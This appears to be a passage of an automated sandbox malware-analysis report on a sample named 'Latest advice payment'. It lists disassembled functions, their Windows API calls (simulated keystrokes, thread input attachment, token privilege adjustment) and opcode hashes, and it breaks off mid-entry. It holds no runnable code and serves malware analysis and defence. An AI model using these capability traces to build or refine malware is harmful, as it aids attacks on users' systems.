                                                            • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                            • Instruction Fuzzy Hash: 0812DC24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                            Function 00580C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 2a2743bb16d8ea25723568126836772772c06e3175869cc0e3cb73343c0a3ea5
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: C2310470A001059FD798EF08C494A69FBA6FF49300B24A7A5E84AEB391D731EDC5DBC0
                                                            Function 0059FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 29b7b392741d79de8631595ff9f98e7168ea652d895ecc0fc186fe75f14401ad
                                                            • Instruction ID: 070b7c0362dd4a6eb2c1267277cc6ac3463e3f1a674d3d43d5a4c9668933dca6
                                                            • Opcode Fuzzy Hash: 29b7b392741d79de8631595ff9f98e7168ea652d895ecc0fc186fe75f14401ad
                                                            • Instruction Fuzzy Hash: 6941D5745043519FDB14DF14C498B1ABFE1BF85318F0988ACE89A9B762D732E885CF52
                                                            Function 00567B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 6dc0f0f7fa145587e87b5c5b0772eabb731544f87c6f5b3b363908ad286559ef
                                                            • Instruction ID: 5712f6a77f7ae2962508d67b473c4677a97970983a3897cdad1682dba4c41cbf
                                                            • Opcode Fuzzy Hash: 6dc0f0f7fa145587e87b5c5b0772eabb731544f87c6f5b3b363908ad286559ef
                                                            • Instruction Fuzzy Hash: 59210672604A09EBDF14DF25E8426A97FB9FF58350F25886EE886C61A0EB3089D0D745
                                                            Function 00564DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00564BEF
                                                              • Part of subcall function 0058525B: __wfsopen.LIBCMT ref: 00585266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564E0F
                                                              • Part of subcall function 00564B6A: FreeLibrary.KERNEL32(00000000), ref: 00564BA4
                                                              • Part of subcall function 00564C70: _memmove.LIBCMT ref: 00564CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: bcff38051ce6988cd1b67e39c97a2f6d652ef022225bb8ec1f46949e40668c40
                                                            • Instruction ID: 5bef19135a19b4ab6397fe1d1987d999c3f083291133b372d61cd9851942443f
                                                            • Opcode Fuzzy Hash: bcff38051ce6988cd1b67e39c97a2f6d652ef022225bb8ec1f46949e40668c40
                                                            • Instruction Fuzzy Hash: C411A731640206ABCF15BF74CC1AFAD7FA9BF84750F108829F541A7191DE719D059F61
                                                            Function 0059FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 4b6b11f8aae71f7d640851ac51f8ad0b1693f04a2c01de82834926963c4cb401
                                                            • Instruction ID: 109f22dd48cd1afd167c7e83b12c4cb6247e4605b768d5b8983c59586b9a35d6
                                                            • Opcode Fuzzy Hash: 4b6b11f8aae71f7d640851ac51f8ad0b1693f04a2c01de82834926963c4cb401
                                                            • Instruction Fuzzy Hash: 0A21F474508342DFDB54DF64C444A1ABBE5BF88314F05896CF98AAB762D731E809CF92
                                                            Function 00567DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 764d19061aae93da2a2e37bd39a30dfaa5a115982b79c77d832f6c7cc35e9409
                                                            • Instruction ID: 4c817132d08bfcc060545b73eed6f2ec02b97380e8af91b1d1959b4fb1812931
                                                            • Opcode Fuzzy Hash: 764d19061aae93da2a2e37bd39a30dfaa5a115982b79c77d832f6c7cc35e9409
                                                            • Instruction Fuzzy Hash: 2901DB72204706AED321AF78C806E677F98FB44760F108529F91ACB1D1EA32E8448790
                                                            Function 00584863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 005848A6
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: cb65415e710e7cfcd4581140f5c963c2f3ee12ee493a232fbc614f0b5d1b5e4d
                                                            • Instruction ID: 1fa35128463262896d419a6de8216d2d50c494cfef37429d8bc166d4531f0dfd
                                                            • Opcode Fuzzy Hash: cb65415e710e7cfcd4581140f5c963c2f3ee12ee493a232fbc614f0b5d1b5e4d
                                                            • Instruction Fuzzy Hash: F4F0AF3190160BABDF11BFA48C0A7AE3EA1FF80325F558414FC24BA192CB788951DF51
                                                            Function 00564E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 824096ccb938acb4dae4a4483d94f2eafbe7fba9a8f570bd473ea237120593e2
                                                            • Instruction ID: 4c6e8f38659a5748f901cc5084216322afccc94717ddd66178eb78f7fb5ed708
                                                            • Opcode Fuzzy Hash: 824096ccb938acb4dae4a4483d94f2eafbe7fba9a8f570bd473ea237120593e2
                                                            • Instruction Fuzzy Hash: 38F01571501B12CFCB389F64E494812BBE9BF543293208A3EE1D683620C7339C84DF41
                                                            Function 00580791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005807B0
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: e4fde00c0d6b514e29e8c55ac8a6240a8e6ae027abbcf2e9f49232612cdefa21
                                                            • Instruction ID: 097db1b86d98c7e1d08db9d86e0a678e3b6e2283631e5d72fac8594b1fd9b6cb
                                                            • Opcode Fuzzy Hash: e4fde00c0d6b514e29e8c55ac8a6240a8e6ae027abbcf2e9f49232612cdefa21
                                                            • Instruction Fuzzy Hash: 58E0863690412957C72096589C09FEA779DEBC86A0F0441B5FD08D7254D9609C808690
                                                            Function 0058525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: 4695ea48b19ac0ef543e8d4f4806b9c92284b7ef109eb7402683cb7fc96bebf8
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: D1B0927A44020C77CE012A92EC02A493F19AB81764F408020FF0C28162AA73A6649A89
                                                            Function 010A461C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 010A4631
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction ID: 1ce594d06d2fa660aabc4753950d56b879f88c7851019c94b8df4dc4994d4e19
                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction Fuzzy Hash: 84E0BF7494010DEFDB00EFE4D6496DE7BB4EF04301F1005A1FD05D7681DB709E548A66
                                                            Function 010A4620 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 010A4631
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 3a9236443e1570fcacae5d7b62bd35e23ea76bf8df677a8c160a9468f78bf60f
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: ECE0E67494010DDFDB00EFF4D6496DE7FB4EF04301F100161FD01D2281D6709D508A62

                                                            Non-executed Functions

                                                            Function 005ECABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 005ECB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005ECB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005ECBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005ECC00
                                                            • SendMessageW.USER32 ref: 005ECC29
                                                            • _wcsncpy.LIBCMT ref: 005ECC95
                                                            • GetKeyState.USER32(00000011), ref: 005ECCB6
                                                            • GetKeyState.USER32(00000009), ref: 005ECCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005ECCD9
                                                            • GetKeyState.USER32(00000010), ref: 005ECCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005ECD0C
                                                            • SendMessageW.USER32 ref: 005ECD33
                                                            • SendMessageW.USER32(?,00001030,?,005EB348), ref: 005ECE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 005ECE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005ECE60
                                                            • SetCapture.USER32(?), ref: 005ECE69
                                                            • ClientToScreen.USER32(?,?), ref: 005ECECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005ECEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005ECEF5
                                                            • ReleaseCapture.USER32 ref: 005ECF00
                                                            • GetCursorPos.USER32(?), ref: 005ECF3A
                                                            • ScreenToClient.USER32(?,?), ref: 005ECF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 005ECFA3
                                                            • SendMessageW.USER32 ref: 005ECFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 005ED00E
                                                            • SendMessageW.USER32 ref: 005ED03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005ED05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 005ED06D
                                                            • GetCursorPos.USER32(?), ref: 005ED08D
                                                            • ScreenToClient.USER32(?,?), ref: 005ED09A
                                                            • GetParent.USER32(?), ref: 005ED0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 005ED123
                                                            • SendMessageW.USER32 ref: 005ED154
                                                            • ClientToScreen.USER32(?,?), ref: 005ED1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005ED1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 005ED20C
                                                            • SendMessageW.USER32 ref: 005ED22F
                                                            • ClientToScreen.USER32(?,?), ref: 005ED281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005ED2B5
                                                              • Part of subcall function 005625DB: GetWindowLongW.USER32(?,000000EB), ref: 005625EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005ED351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pbb
                                                            • API String ID: 3977979337-2715286461
                                                            • Opcode ID: fa2466d3253302e34413b418961c61a112beb74964f13a31f889ecb95cbc99ca
                                                            • Instruction ID: fdecba9a0b2e41d25456a7a82c64b2f58ff82c480f48381387cf86241872ded1
                                                            • Opcode Fuzzy Hash: fa2466d3253302e34413b418961c61a112beb74964f13a31f889ecb95cbc99ca
                                                            • Instruction Fuzzy Hash: B542AE342046C1AFD728CF26D889AAABFE9FF49310F140919F5D6CB2A0CB71D946DB51
                                                            Function 00576F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: ]a$3cW$DEFINE$P\a$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_W
                                                            • API String ID: 1357608183-3518050660
                                                            • Opcode ID: c214ffda42cf7aebba1123430a03d5fda375864b4ee81a2861ef3228a563e493
                                                            • Instruction ID: 965a40feb7011f66c376143fffe09d50b563d0368d2459669c07c76ae9c12238
                                                            • Opcode Fuzzy Hash: c214ffda42cf7aebba1123430a03d5fda375864b4ee81a2861ef3228a563e493
                                                            • Instruction Fuzzy Hash: B593B475E00219DFDB24CF58D8857EDBBB1FF48310F24856AE949AB281E770AE81DB50
                                                            Function 005648D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 005648DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0059D665
                                                            • IsIconic.USER32(?), ref: 0059D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 0059D67B
                                                            • SetForegroundWindow.USER32(?), ref: 0059D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0059D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 0059D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0059D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0059D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0059D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0059D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 0059D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D71E
                                                            • SetForegroundWindow.USER32(?), ref: 0059D721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0059D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: f6dbbcd42e3cf30ef8e126fb38a3b711bec80ea9dafe8eb693885b7c479c2d7f
                                                            • Instruction ID: e4fbf6a73cbc1914482df271289ab10db6a3ef845ed453cdccc3f46642c6e003
                                                            • Opcode Fuzzy Hash: f6dbbcd42e3cf30ef8e126fb38a3b711bec80ea9dafe8eb693885b7c479c2d7f
                                                            • Instruction Fuzzy Hash: 4E317071A40358BBEF246FA19C89F7F7E6CEB54B50F114026FA04EA1D1CAB15940ABA0
                                                            Function 005B8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005B882B
                                                              • Part of subcall function 005B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005B8858
                                                              • Part of subcall function 005B87E1: GetLastError.KERNEL32 ref: 005B8865
                                                            • _memset.LIBCMT ref: 005B8353
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005B83A5
                                                            • CloseHandle.KERNEL32(?), ref: 005B83B6
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005B83CD
                                                            • GetProcessWindowStation.USER32 ref: 005B83E6
                                                            • SetProcessWindowStation.USER32(00000000), ref: 005B83F0
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005B840A
                                                              • Part of subcall function 005B81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005B8309), ref: 005B81E0
                                                              • Part of subcall function 005B81CB: CloseHandle.KERNEL32(?,?,005B8309), ref: 005B81F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
